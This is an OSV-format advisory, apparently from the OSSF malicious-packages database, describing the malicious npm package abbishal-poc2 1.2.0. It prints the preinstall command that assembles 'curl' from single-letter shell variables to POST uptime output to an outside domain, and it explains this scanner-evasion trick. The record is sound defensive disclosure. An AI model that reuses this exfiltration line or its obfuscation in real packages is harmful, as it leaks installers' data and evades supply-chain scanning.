{"id":"MAL-2026-17654","summary":"Malicious code in abbishal-poc2 (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (e1a4950e43d1db42d899107c229ccdbb21fd5e8eeeb4d5771b352a8918658e4f)\npackage.json declares a preinstall script `sh./test.sh`. test.sh assembles the string `curl` from single-character shell variables (b=e, i=c, s=n, h=u, a=v, l=rl) and then invokes `$i$h$l -d \"`uptime`\" https://abbishal.com/sh/poc`, POSTing the output of `uptime` (and implicitly the installer's source IP) to abbishal.com at npm install time. The README claims the package has no install scripts and no network activity, directly contradicting the shipped behavior. The command-name obfuscation via per-letter variable assembly is a technique to evade static scanners searching for `curl` in lifecycle scripts, and the destination domain does not match the package's claimed publisher.\n","modified":"2026-10-08T04:00:04.893469894Z","published":"2026-10-08T03:40:58Z","database_specific":{"malicious-packages-origins":[{"source":"amazon-inspector","versions":["1.2.0"],"id":"IN-MAL-2026-021131","import_time":"2026-10-08T03:50:29.957301862Z","modified_time":"2026-10-08T03:40:58Z","sha256":"e1a4950e43d1db42d899107c229ccdbb21fd5e8eeeb4d5771b352a8918658e4f"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/abbishal-poc2/v/1.2.0"}],"affected":[{"package":{"name":"abbishal-poc2","ecosystem":"npm","purl":"pkg:npm/abbishal-poc2"},"versions":["1.2.0"],"database_specific":{"indicators":{"package_integrity":[{"filename":"abbishal-poc2-1.2.0.tgz","hashes":{"sha512_sri":"sha512-0L2VJZtvR4IN46fNLFpIlshfVxF7MiCBv7jQ6Iv/CHSA1iect0Yrn0pDy9tm7IQ4Dnre9/ByYnQDRjH6MH4A9A==","sha1":"f3d5c0b98813defc1c3b63ee00235d14954db5ec"}}],"evidence_files":[{"sha256":"5c9586f87237f19f1c97f5614dc2b525f555879403ef3228313be132e9a410c5","tlsh":"840110b34564a374ede908b21a9913e6c2a9e04a867398b8a2ef810512026a0222fd20","path":"test.sh"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/abbishal-poc2/MAL-2026-17654.json","cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}]}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}